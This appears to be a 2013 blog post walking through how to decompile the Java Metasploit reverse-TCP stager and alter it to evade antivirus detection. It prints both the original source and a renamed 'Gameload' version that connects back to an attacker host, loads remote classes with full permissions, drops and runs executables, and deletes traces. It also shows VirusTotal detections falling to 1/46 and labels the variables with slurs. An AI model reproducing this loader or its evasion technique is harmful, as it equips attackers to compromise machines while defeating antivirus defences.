Let me present you the Java Reverse MetaSploit Stager.
Here some VirusTotal Scan from the default Metasploit Payload.
Detection ratio:
31 / 46
File name:
evil2.jar
File type:
JAR
AntiVir
EXP/JAVA.Carbul.Gen
GData
Application.Metasploit.4441
and much more founds on this payload.Good News ….. Not Really
The Most AntiVirus use a Simple Patter to Detect Virus Malware Payloads Exploits ….
Now its time to get Dirty ?
Get some Java Decompiler and decompile the payload.jar file.
I use JD Plugin for Eclipse. Google is your best Friend.
Now we got the Java Source from the MetaSploit Stager.
package metasploit;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
import java.lang.reflect.Method;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.util.Hashtable;
import java.util.Locale;
import java.util.Properties;
import java.util.Stack;
import java.util.StringTokenizer;
import java.util.Vector;
public class Payload extends ClassLoader
{
private static final String OS_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
private static final String PATH_SEP = System.getProperty("path.separator");
private static final boolean IS_AIX = "aix".equals(OS_NAME);
private static final boolean IS_DOS = PATH_SEP.equals(";");
private static final String JAVA_HOME = System.getProperty("java.home");
public static void main(String[] paramArrayOfString)
throws Exception
{
Properties localProperties = new Properties();
Class localClass = Payload.class;
String str1 = localClass.getName().replace('.', '/') + ".class";
InputStream localInputStream = localClass.getResourceAsStream("/metasploit.dat");
if (localInputStream != null)
{
localProperties.load(localInputStream);
localInputStream.close();
}
String str2 = localProperties.getProperty("Executable");
File localFile2;
if (str2 != null)
{
File localFile1 = File.createTempFile("~spawn", ".tmp");
localFile1.delete();
localObject1 = new File(localFile1.getAbsolutePath() + ".dir");
((File)localObject1).mkdir();
localFile2 = new File((File)localObject1, str2);
writeEmbeddedFile(localClass, str2, localFile2);
localProperties.remove("Executable");
localProperties.put("DroppedExecutable", localFile2.getCanonicalPath());
}
int i = Integer.parseInt(localProperties.getProperty("Spawn", "0"));
Object localObject1 = localProperties.getProperty("DroppedExecutable");
Object localObject2;
Object localObject3;
Object localObject4;
Object localObject5;
Object localObject6;
int m;
if (i > 0)
{
localProperties.setProperty("Spawn", String.valueOf(i - 1));
localFile2 = File.createTempFile("~spawn", ".tmp");
localFile2.delete();
File localFile3 = new File(localFile2.getAbsolutePath() + ".dir");
localObject2 = new File(localFile3, "metasploit.dat");
localObject3 = new File(localFile3, str1);
((File)localObject3).getParentFile().mkdirs();
writeEmbeddedFile(localClass, str1, (File)localObject3);
if (localProperties.getProperty("URL", "").startsWith("https:"))
writeEmbeddedFile(localClass, "metasploit/PayloadTrustManager.class", new File(((File)localObject3).getParentFile(), "PayloadTrustManager.class"));
if (localProperties.getProperty("AESPassword", null) != null)
writeEmbeddedFile(localClass, "metasploit/AESEncryption.class", new File(((File)localObject3).getParentFile(), "AESEncryption.class"));
localObject4 = new FileOutputStream((File)localObject2);
localProperties.store((OutputStream)localObject4, "");
((FileOutputStream)localObject4).close();
localObject5 = Runtime.getRuntime().exec(new String[] { getJreExecutable("java"), "-classpath", localFile3.getAbsolutePath(), localClass.getName() });
((Process)localObject5).getInputStream().close();
((Process)localObject5).getErrorStream().close();
Thread.sleep(2000L);
localObject6 = new File[] { localObject3, ((File)localObject3).getParentFile(), localObject2, localFile3 };
for (int k = 0; k < localObject6.length; k++)
for (m = 0; (m < 10) && (!localObject6[k].delete()); m++)
{
localObject6[k].deleteOnExit();
Thread.sleep(100L);
}
}
if (localObject1 != null)
{
localFile2 = new File((String)localObject1);
if (!IS_DOS)
try
{
try
{
class$java$io$File.getMethod("setExecutable", new Class[] { Boolean.TYPE }).invoke(localFile2, new Object[] { Boolean.TRUE });
}
catch (NoSuchMethodException localNoSuchMethodException)
{
Runtime.getRuntime().exec(new String[] { "chmod", "+x", localObject1 }).waitFor();
}
}
catch (Exception localException)
{
localException.printStackTrace();
}
Runtime.getRuntime().exec(new String[] { localObject1 });
if (!IS_DOS)
{
localFile2.delete();
localFile2.getParentFile().delete();
}
}
else
{
int j = Integer.parseInt(localProperties.getProperty("LPORT", "4444"));
String str3 = localProperties.getProperty("LHOST", null);
localObject2 = localProperties.getProperty("URL", null);
if (j <= 0)
{
localObject3 = System.in;
localObject4 = System.out;
}
else if (localObject2 != null)
{
if (((String)localObject2).startsWith("raw:"))
{
localObject3 = new ByteArrayInputStream(((String)localObject2).substring(4).getBytes("ISO-8859-1"));
}
else if (((String)localObject2).startsWith("https:"))
{
localObject5 = new URL((String)localObject2).openConnection();
Class.forName("metasploit.PayloadTrustManager").getMethod("useFor", new Class[] { URLConnection.class }).invoke(null, new Object[] { localObject5 });
localObject3 = ((URLConnection)localObject5).getInputStream();
}
else
{
localObject3 = new URL((String)localObject2).openStream();
}
localObject4 = new ByteArrayOutputStream();
}
else
{
if (str3 != null)
{
localObject5 = new Socket(str3, j);
}
else
{
localObject6 = new ServerSocket(j);
localObject5 = ((ServerSocket)localObject6).accept();
((ServerSocket)localObject6).close();
}
localObject3 = ((Socket)localObject5).getInputStream();
localObject4 = ((Socket)localObject5).getOutputStream();
}
localObject5 = localProperties.getProperty("AESPassword", null);
if (localObject5 != null)
{
localObject6 = (Object[])Class.forName("metasploit.AESEncryption").getMethod("wrapStreams", new Class[] { InputStream.class, OutputStream.class, String.class }).invoke(null, new Object[] { localObject3, localObject4, localObject5 });
localObject3 = (InputStream)localObject6[0];
localObject4 = (OutputStream)localObject6[1];
}
localObject6 = new StringTokenizer("Payload -- " + localProperties.getProperty("StageParameters", ""), " ");
String[] arrayOfString = new String[((StringTokenizer)localObject6).countTokens()];
for (m = 0; m < arrayOfString.length; m++)
arrayOfString[m] = ((StringTokenizer)localObject6).nextToken();
new Payload().bootstrap((InputStream)localObject3, (OutputStream)localObject4, localProperties.getProperty("EmbeddedStage", null), arrayOfString);
}
}
private static void writeEmbeddedFile(Class paramClass, String paramString, File paramFile)
throws FileNotFoundException, IOException
{
InputStream localInputStream = paramClass.getResourceAsStream("/" + paramString);
FileOutputStream localFileOutputStream = new FileOutputStream(paramFile);
byte[] arrayOfByte = new byte[4096];
int i;
while ((i = localInputStream.read(arrayOfByte)) != -1)
localFileOutputStream.write(arrayOfByte, 0, i);
localFileOutputStream.close();
}
private final void bootstrap(InputStream paramInputStream, OutputStream paramOutputStream, String paramString, String[] paramArrayOfString)
throws Exception
{
try
{
DataInputStream localDataInputStream = new DataInputStream(paramInputStream);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
Class localClass;
if (paramString == null)
{
int i = localDataInputStream.readInt();
do
{
byte[] arrayOfByte = new byte[i];
localDataInputStream.readFully(arrayOfByte);
resolveClass(localClass = defineClass(null, arrayOfByte, 0, i, localProtectionDomain));
i = localDataInputStream.readInt();
}
while (i > 0);
}
else
{
localClass = Class.forName("javapayload.stage." + paramString);
}
Object localObject = localClass.newInstance();
localClass.getMethod("start", new Class[] { DataInputStream.class, OutputStream.class, new String[0].getClass() }).invoke(localObject, new Object[] { localDataInputStream, paramOutputStream, paramArrayOfString });
}
catch (Throwable localThrowable)
{
localThrowable.printStackTrace(new PrintStream(paramOutputStream));
}
}
private static String getJreExecutable(String paramString)
{
File localFile = null;
if (IS_AIX)
localFile = findInDir(JAVA_HOME + "/sh", paramString);
if (localFile == null)
localFile = findInDir(JAVA_HOME + "/bin", paramString);
if (localFile != null)
return localFile.getAbsolutePath();
return addExtension(paramString);
}
private static String addExtension(String paramString)
{
return paramString + (IS_DOS ? ".exe" : "");
}
private static File findInDir(String paramString1, String paramString2)
{
File localFile1 = normalize(paramString1);
File localFile2 = null;
if (localFile1.exists())
{
localFile2 = new File(localFile1, addExtension(paramString2));
if (!localFile2.exists())
localFile2 = null;
}
return localFile2;
}
private static File normalize(String paramString)
{
Stack localStack = new Stack();
String[] arrayOfString = dissect(paramString);
localStack.push(arrayOfString[0]);
StringTokenizer localStringTokenizer = new StringTokenizer(arrayOfString[1], File.separator);
while (localStringTokenizer.hasMoreTokens())
{
localObject = localStringTokenizer.nextToken();
if (!".".equals(localObject))
if ("..".equals(localObject))
{
if (localStack.size() < 2)
return new File(paramString);
localStack.pop();
}
else
{
localStack.push(localObject);
}
}
Object localObject = new StringBuffer();
for (int i = 0; i < localStack.size(); i++)
{
if (i > 1)
((StringBuffer)localObject).append(File.separatorChar);
((StringBuffer)localObject).append(localStack.elementAt(i));
}
return new File(((StringBuffer)localObject).toString());
}
private static String[] dissect(String paramString)
{
char c = File.separatorChar;
paramString = paramString.replace('/', c).replace('\\', c);
String str = null;
int i = paramString.indexOf(':');
int j;
if ((i > 0) && (IS_DOS))
{
j = i + 1;
str = paramString.substring(0, j);
char[] arrayOfChar = paramString.toCharArray();
str = str + c;
j = arrayOfChar[j] == c ? j + 1 : j;
StringBuffer localStringBuffer = new StringBuffer();
for (int k = j; k < arrayOfChar.length; k++)
if ((arrayOfChar[k] != c) || (arrayOfChar[(k - 1)] != c))
localStringBuffer.append(arrayOfChar[k]);
paramString = localStringBuffer.toString();
}
else if ((paramString.length() > 1) && (paramString.charAt(1) == c))
{
j = paramString.indexOf(c, 2);
j = paramString.indexOf(c, j + 1);
str = j > 2 ? paramString.substring(0, j + 1) : paramString;
paramString = paramString.substring(str.length());
}
else
{
str = File.separator;
paramString = paramString.substring(1);
}
return new String[] { str, paramString };
}
}
Im not a Dev i never learning java ,just a normal Guy like you with a small Brain.
But if we read the Source Code we can learn much things or use Gooolge its my best friend. Big Thanks to Google and the guys how fill it I Love you.
Now we Build a new Java Project in Eclipse Paste the Java Source code into it.
Fix the Errors
Try too Compile it and check if it works.
Now its time too change the Source code else the Antivirus Software will find your Payload.
After some long time ….. 15 mins recoding
Time to test the New Payload.
Start Armitage Open a Java Meterpreter Reverse Tcp start listen on your Port.
After some time My New Metasploit Payload Works with small changes
But is it now FUD ? Lets test it Again on VirusTotal.
Detection ratio:
1 / 46
File name:
Gameload.class
File type:
Java Bytecode
AntiVir EXP/JAVA.Loader.Gen
97 % FUD i tested much things to get it 100 % FUD but atm i cant finde Antivir Patter Good WOrk .. shame on me ……
Now you can compile the Java Code to a Jar or Compile the Class into a Exe file.Read the other Post How too do it.
We got the Same Results
Detection ratio:
1 / 46
I split the exe file and found the AntiVir Patter
Hex to Txt
s.RÛNÛ@.=K..×MH€@/.B)$…ÖR_SUª •.Üò..ž7Î(ÙÈØÈ^B?‡_à...}¬..Uuv“^¤‚ZYžÙ..9çÌìÞ~¿þŠ.^aÓÁ”Àz˜.ù)õéK$»þð.ùíãHfƒ.(Éh?>Tq/9u..˜.Ê‘ô#.÷ýýî.Bí (°b£òTû4¢Xûï..>˜E 2M1¥.Å·*Vú.@®Ñì.äw’.¹¬à...Ó.å@Åôùä¨Ké.ìF$P.’PF.™*³Ÿ.óz 2..à..·.ÖêÙUÙ±Ôá€z.µFðKìO™.fÇÅ...Ì.Tþ:öPâ@¡Ozo×v°çâ.ž8x,°|.’v˜.Å.žb™epéŸa.z£y_.ã”–¡Xñ°j¦S.M_LM#-0wG.<áÌVóeü.XÀm''iH.•.éÒ.“{m.P.3ò_.0Åž/Ší.ï|ö‚}áå%Üs{ì±-Úà..²õÆ.(¡Ìž..*“bâì.ûÅ..T+¸9Cù.KŸ¶¿ÁÙ¾À³ßp5ËìÁeÀ..U†ª±5ð«cˆ.¼YÕ±Æ.%Öø.ëVï.‹´ñ.PK..........ë.AB‹¨%ª·...-..
Hex
5A 59 9E D9 9D 9D 39 E7 CC EC DE 7E BF FE 8A 1C 5E 61 D3 C1 94 C0 7A 98 1C F9 29 F5 E9 4B 24 BB FE F0 0D F9 ED E3 48 66 83 9D 28 C9 68 3F 3E 54 71 2F 39 75 90 17 98 1D CA 91 F4 23 19 F7 FD FD EE 90 42 ED A0 28 B0 62 A3 F2 54 FB 34 A2 58 FB EF 0F 0F 3E 98 45 A0 32 4D 31 A5 02 C5 B7 2A 56 FA 9D 40 AE D1 EC 08 E4 77 92 1E B9 AC E0 81 07 07 D3 02 E5 40 C5 F4 F9 E4 A8 4B E9 81 EC 46 24 50 0D 92 50 46 1D 99 2A B3 9F 04 F3 7A A0 32 81 8D E0 7F 04 B7 18 D6 EA D9 55 D9 B1 D4 E1 80 7A 02 B5 46 F0 4B EC 4F 99 AD 66 C7 C5 1C 16 1C CC 0B 54 FE 3A F6 50 C3 A2 40 A1 4F 7A 6F D7 76 B0 E7 E2 11 9E 38 78 2C B0 7C 8F 92 76 98 12 C5 1E 9E 62 99 65 70 E9 9F 61 81 7A A3 79 5F 0F E3 94 96 A1 58 F1 B0 6A A6 53 08 4D 5F 4C 4D 23 2D 30 77 47 07 3C E1 CC 56 F3 65 FC 03 58 C0 6D 27 27 69 48 1F 95 19 E9 D2 1D 93 7B 6D 08 50 07 33 F2 5F 00 30 C5 9E 2F 8A ED 0C EF 7C F6 82 7D E1 E5 25 DC 73 7B EC B1 2D DA E0 0C 1E B2 F5 C6 09 28 A1 CC 9E 1F 0E 2A 93 62 E2 EC 1C FB C5 AD 0B 54 2B B8 39 43 F9 0A 4B 9F B6 BF C1 D9 BE C0 B3 DF 70 35 CB EC C1 65 C0 12 7F 55 86 AA B1 35 F0 AB 63 88 09 BC 59 D5 B1 C6 04 25 D6 F8 1C EB 56 EF 0B 8B B4 F1 03 50 4B 01 02 14 00 14 00 00 00 08 00 EB 05 41 42 8B A8 25 AA B7 00 00 00 2D 01 00
I know if i want it 100 % FUD i got it fud but atm i dont have fun to Spend too much time on it.
97 % FUD i think its ok
And here the Java Source Code of the New 97% FUD Java Metasploit Stager.
Gameload.java
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
package sploit;
import java.io.*;
import java.lang.reflect.Method;
import java.net.*;
import java.security.*;
import java.security.cert.Certificate;
import java.util.*;
@SuppressWarnings("unused")
public class Gameload extends ClassLoader
{
public Gameload()
{
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
}
public static void main(String[] args) {
// TODO Auto-generated method stub
try {
crashyyy(null);
} catch (Exception e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
@SuppressWarnings("resource")
public static void crashyyy(String args[])
throws Exception
{
Properties properties = new Properties();
@SuppressWarnings("rawtypes")
Class play1 = sploit.Gameload.class;
String s = play1.getName().replace('.', '/') + ".class";
InputStream inputstream = play1.getResourceAsStream("/SecurityisjustanIllusion.dat"); // Fuck Avast GData Sophos ;) Just Pattern a .dat file lamers
if(inputstream != null)
{
properties.load(inputstream);
inputstream.close();
}
String zero1 = properties.getProperty("Execute");
if(zero1 != null)
{
File gayfile = File.createTempFile("~0Gay", ".SecurityisjustanIllusion");
gayfile.delete();
File gayfile1 = new File(gayfile.getAbsolutePath() + ".dir");
gayfile1.mkdir();
File gayfile2 = new File(gayfile1, zero1);
writeEmbeddedFile(play1, zero1, gayfile2);
properties.remove("Execute");
properties.put("Dr0ppExecutable", gayfile2.getCanonicalPath());
}
int i = Integer.parseInt(properties.getProperty("0Gay", "0"));
String zero2 = properties.getProperty("Dr0pExecutable");
if(i > 0)
{
properties.setProperty("0Gay", String.valueOf(i - 1));
File gayfile3 = File.createTempFile("~0Gay", ".SecurityisjustanIllusion");
gayfile3.delete();
File gayfile5 = new File(gayfile3.getAbsolutePath() + ".dir");
File gayfile6 = new File(gayfile5, "SecurityisjustanIllusion.dat");
File gayfile7 = new File(gayfile5, s);
gayfile7.getParentFile().mkdirs();
writeEmbeddedFile(play1, s, gayfile7);
if(properties.getProperty("URL", "").startsWith("https:"))
writeEmbeddedFile(play1, "Gamesploit/GameloadTrust0Manager.class", new File(gayfile7.getParentFile(), "Gameload0TrustManager.class"));
if(properties.getProperty("AESPassword", null) != null)
writeEmbeddedFile(play1, "Gamesploit/AESEncryption.class", new File(gayfile7.getParentFile(), "AESEncryption.class"));
FileOutputStream fileoutputstream = new FileOutputStream(gayfile6);
properties.store(fileoutputstream, "");
fileoutputstream.close();
Process process = Runtime.getRuntime().exec(new String[] {
getJreExecutable("java"), "-classpath", gayfile5.getAbsolutePath(), play1.getName()
});
process.getInputStream().close();
process.getErrorStream().close();
Thread.sleep(2000L);
File afile[] = {
gayfile7, gayfile7.getParentFile(), gayfile6, gayfile5
};
for(int k = 0; k < afile.length; k++)
{
for(int l = 0; l < 10 && !afile[k].delete(); l++)
{
afile[k].deleteOnExit();
Thread.sleep(100L);
}
}
} else
if(zero2 != null)
{
File gayfile4 = new File(zero2);
if(!IS_WIN)
try
{
try
{
(java.io.File.class).getMethod("setExecutable", new Class[] {
Boolean.TYPE
}).invoke(gayfile4, new Object[] {
Boolean.TRUE
});
}
catch(NoSuchMethodException nosuchmethodexception)
{
Runtime.getRuntime().exec(new String[] {
"chmod", "+x", zero2
}).waitFor();
}
}
catch(Exception exception)
{
exception.printStackTrace();
}
Runtime.getRuntime().exec(new String[] {
zero2
});
if(!IS_WIN)
{
gayfile4.delete();
gayfile4.getParentFile().delete();
}
} else
{
int j = Integer.parseInt(properties.getProperty("LPORT", "31337"));
String zero3 = properties.getProperty("LHOST", null);
String zero4 = properties.getProperty("URL", null);
Object zeroobj;
Object zeroobj1;
if(j <= 0)
{
zeroobj = System.in;
zeroobj1 = System.out;
} else
if(zero4 != null)
{
if(zero4.startsWith("raw:"))
zeroobj = new ByteArrayInputStream(zero4.substring(4).getBytes("ISO-8859-1"));
else
if(zero4.startsWith("https:"))
{
URLConnection urlconnection = (new URL(zero4)).openConnection();
Class.forName("Gamesploit.GameloadTrustManager").getMethod("useFor", new Class[] {
java.net.URLConnection.class
}).invoke(null, new Object[] {
urlconnection
});
zeroobj = urlconnection.getInputStream();
} else
{
zeroobj = (new URL(zero4)).openStream();
}
zeroobj1 = new ByteArrayOutputStream();
} else
{
Socket socket;
if(zero3 != null)
{
socket = new Socket(zero3, j);
} else
{
ServerSocket gaysocket = new ServerSocket(j);
socket = gaysocket.accept();
gaysocket.close();
}
zeroobj = socket.getInputStream();
zeroobj1 = socket.getOutputStream();
}
String zero5 = properties.getProperty("AESPassword", null);
if(zero5 != null)
{
Object aobj[] = (Object[])Class.forName("Gamesploit.AESEncryption").getMethod("wrapStreams", new Class[] {
java.io.InputStream.class, java.io.OutputStream.class, java.lang.String.class
}).invoke(null, new Object[] {
zeroobj, zeroobj1, zero5
});
zeroobj = (InputStream)aobj[0];
zeroobj1 = (OutputStream)aobj[1];
}
StringTokenizer stringtokenizer = new StringTokenizer("Gaylo0ad -- " + properties.getProperty("Para", ""), " ");
String args1[] = new String[stringtokenizer.countTokens()];
for(int i1 = 0; i1 < args1.length; i1++)
args1[i1] = stringtokenizer.nextToken();
(new Gameload()).bootstrap(((InputStream) (zeroobj)), ((OutputStream) (zeroobj1)), properties.getProperty("Emage", null), args1);
}
}
private static void writeEmbeddedFile(@SuppressWarnings("rawtypes") Class play1, String s, File file)
throws FileNotFoundException, IOException
{
InputStream inputstream = play1.getResourceAsStream("/" + s);
FileOutputStream fileoutputstream = new FileOutputStream(file);
byte abyte0[] = new byte[4096];
int i;
while((i = inputstream.read(abyte0)) != -1)
fileoutputstream.write(abyte0, 0, i);
fileoutputstream.close();
}
@SuppressWarnings("unchecked")
private final void bootstrap(InputStream inputstream, OutputStream outputstream, String s, String as[])
throws Exception
{
try
{
DataInputStream datainputstream = new DataInputStream(inputstream);
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
@SuppressWarnings("rawtypes")
Class play1;
if(s == null)
{
int i = datainputstream.readInt();
do
{
byte abyte0[] = new byte[i];
datainputstream.readFully(abyte0);
resolveClass(play1 = defineClass(null, abyte0, 0, i, protectiondomain));
i = datainputstream.readInt();
} while(i > 0);
} else
{
play1 = Class.forName("gameload.woot." + s);
}
Object obj = play1.newInstance();
play1.getMethod("start", new Class[] {
java.io.DataInputStream.class, java.io.OutputStream.class, java.lang.String[].class
}).invoke(obj, new Object[] {
datainputstream, outputstream, as
});
}
catch(Throwable throwable)
{
throwable.printStackTrace(new PrintStream(outputstream));
}
}
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
private static String getJreExecutable(String s)
{
File file = null;
if(IS_GAME)
file = findInDir(GAY_HOME + "/sh", s);
if(file == null)
file = findInDir(GAY_HOME + "/bin", s);
if(file != null)
return file.getAbsolutePath();
else
return addExtension(s);
}
private static String addExtension(String s)
{
return s + (IS_WIN ? ".exe" : "");
}
private static File findInDir(String s, String s1)
{
File gayfile = normalize(s);
File gayfile1 = null;
if(gayfile.exists())
{
gayfile1 = new File(gayfile, addExtension(s1));
if(!gayfile1.exists())
gayfile1 = null;
}
return gayfile1;
}
@SuppressWarnings("unchecked")
private static File normalize(String s)
{
@SuppressWarnings("rawtypes")
Stack gay = new Stack();
String as[] = dissect(s);
gay.push(as[0]);
StringTokenizer stringtokenizer = new StringTokenizer(as[1], File.separator);
do
{
if(!stringtokenizer.hasMoreTokens())
break;
String zero1 = stringtokenizer.nextToken();
if(!".".equals(zero1))
if("..".equals(zero1))
{
if(gay.size() < 2)
return new File(s);
gay.pop();
} else
{
gay.push(zero1);
}
} while(true);
StringBuffer gaybuffer = new StringBuffer();
for(int i = 0; i < gay.size(); i++)
{
if(i > 1)
gaybuffer.append(File.separatorChar);
gaybuffer.append(gay.elementAt(i));
}
return new File(gaybuffer.toString());
}
private static String[] dissect(String s)
{
char c = File.separatorChar;
s = s.replace('/', c).replace('\\', c);
String zero1 = null;
int i = s.indexOf(':');
if(i > 0 && IS_WIN)
{
int j = i + 1;
zero1 = s.substring(0, j);
char ac[] = s.toCharArray();
zero1 = zero1 + c;
j = ac[j] != c ? j : j + 1;
StringBuffer stringbuffer = new StringBuffer();
for(int l = j; l < ac.length; l++)
if(ac[l] != c || ac[l - 1] != c)
stringbuffer.append(ac[l]);
s = stringbuffer.toString();
} else
if(s.length() > 1 && s.charAt(1) == c)
{
int k = s.indexOf(c, 2);
k = s.indexOf(c, k + 1);
zero1 = k <= 2 ? s : s.substring(0, k + 1);
s = s.substring(zero1.length());
} else
{
zero1 = File.separator;
s = s.substring(1);
}
return (new String[] {
zero1, s
});
}
private static final String GAME_NAME;
private static final String PATH_SEP = System.getProperty("path.separator");
private static final boolean IS_GAME;
private static final boolean IS_WIN = PATH_SEP.equals(";");
private static final String GAY_HOME = System.getProperty("java.home");
static
{
GAME_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
IS_GAME = "gam".equals(GAME_NAME);
}
}
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
Have pfun ….
Use it for Personal use or study purposes.
No comments:
Post a Comment